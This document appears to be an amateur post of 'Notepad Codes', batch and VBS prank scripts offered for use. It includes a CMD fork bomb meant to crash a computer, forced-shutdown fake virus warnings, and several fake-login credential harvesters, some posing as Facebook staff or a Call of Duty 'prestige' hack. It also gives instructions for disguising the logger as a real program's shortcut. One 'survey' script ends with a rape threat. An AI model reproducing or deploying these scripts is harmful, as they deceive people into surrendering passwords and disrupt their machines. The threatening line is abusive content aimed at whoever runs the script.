Notepad Codes

#1 simple a loop that opens CMD after CMD until computer crashes
@echo off
:a
Start cmd
goto :a


#2 a keylogger/shutdown computer code
@echo off
color c
start Iexplore
Title WARNING
echo WARNING VIRUS HAS ENTERED THROUGH THE DATA FRAME
echo Email Microsoft immediately
cd "C:\CMDREMARKS"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >CMDREMARKS.txt
shutdown -s -t 30 -c "Request Denied"

#3 A fake virus that makes user think alll files are being deleted
)@echo off
echo WARNING CPU HAS DETECTED A THREAT TO THE SYSTEM
pause
echo ATTEMPTING TO RESTORE BY DELETEING
pause
echo DELETEING ALL FILES!!
pause
shutdown -s -t 30 -c "deleting"
:hack
echo file:2323#@$
echo file:32433$$%%
echo file:#$@#$!53
echo file:#$35323
echo file:24@#$%2
goto hack

#4 a key logger that makes users think they are getting 10th prestige in cod
@echo off
color a
title Login
cls
echo Please Enter Email Adress And Password.
echo Hacks will be available the next time you log in.
echo Email CodHacks@yahoo.com for support
echo.
echo.
cd "C:\Logs"
set /p user=Username:
set /p pass=Password:
echo prestige (1/2/3/4/5/6/7/8/9/10/11/12/13/14/15)
pause
echo Username="%user%" Password="%pass%" >Log.txt
start >>Program Here<<
exit
NOTE: here are the instructions for the keylogger codes:
Drag And Drop The Folder "Logs" (make one) (also make a txt document named logs inside the folder) To The C:\ Drive
Edit Logger Code.txt To Your Desirations Click File> Save As> and Save it To Your >Desktop< As Logger.bat
make Sure You Save It As     
 
   Logger.bat
or it wont work.
now drag and drop Logger.bat into C:\ Drive
now Create A Shortcut On your Desktop With The Name Of The program that you want to immitate as the title
now change the icon and you are done


#5 keylogger for a facebook
@echo off
color 9
title Login
cls
echo Please Enter Email Adress And Password.
echo Contact FacebookStaff@yahoo.com
echo.
cd "C:\Logs"
set /p user=Username:
set /p pass=Password:
echo Website Blocks Prevented Operation
pause >n
echo Username="%user%" Password="%pass%" >Log.txt
start >>Program Here<<
exit


#6 a funny survey you can attach to a file
@echo off
echo Are you a Boy or Girl? (B/G)
pause
echo Are your eyes BLue or brown? (BR/BL)
pause
echo are you gay,straight, or bisexual?(G/S/B)
pause
echo Thanks for describing yourself to me. I will rape you later
pause



#7 simple fake shutdown virus
shutdown -s -t 30 -c "WARNING TROJAN DETECTED"


#8 code to make cd drive open repeatedly (save as .vbs)
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


#9 Unblock CMD
@echo off
command
@echo on



#10 Web Unblocker
@echo off
title web unblocker
nslookup

I will be posting more later....